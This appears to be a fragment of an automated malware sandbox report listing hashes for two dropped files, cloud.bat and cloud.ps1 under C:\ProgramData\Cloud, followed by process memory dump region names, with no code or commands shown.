SHA512 ca1e9e201785fa611520ee2585208fb0684fd338ff1ab1d515523e03677ac4ac1ca5353fdc17bcba4c6c39aa37f9be182c5f7187b8dd9520c8604a001bd69f80

C:\ProgramData\Cloud\cloud.bat

MD5 b8bdfc7895feaaacba3711d17be6778a
SHA1 fa0bc12827b348fe540a13683897deb207650df7
SHA256 e209153dda335fec8fa021f1022c4f9fe041cb527c2b9068eb9ec911429f20a3
SHA512 ea91a8262eacba0bcd6f692b5141124d7fedc98507ad6ab71ade565b347fe328780221f6972cc5c98a9471662474bf8c93e1219d241ff5f90579f7f8e8dd5156

C:\ProgramData\Cloud\cloud.ps1

MD5 81fe8fe5684ecf16d936250bb94c852a
SHA1 a0a18d8d75e12546baa0b7dfd0dfb02dbefbac40
SHA256 ca0713d77d71359ff692385a2bb92e0b22fe7f0db9a356fd4ffbbfeb34911584
SHA512 d0a35efecc947e2e5d99d3f58a494693d5ebd48635f749f87f341e0a1ce965b7a413754a0316c973eebac4c8e8a12315a916adbc4350a0819132debde1ea7013

memory/1712-46-0x0000022CEA330000-0x0000022CEA33E000-memory.dmp

memory/3836-47-0x00000000009C0000-0x00000000009D8000-memory.dmp

memory/3836-49-0x0000000005100000-0x0000000005116000-memory.dmp

memory/3836-50-0x00000000059D0000-0x0000000005F74000-memory.dmp

memory/3836-51-0x0000000005610000-0x00000000056A2000-memory.dmp

memory/3836-52-0x0000000005600000-0x000000000560A000-memory.dmp

memory/3836-53-0x0000000006080000-0x000000000611C000-memory.dmp

memory/3836-54-0x00000000062C0000-0x0000000006326000-memory.dmp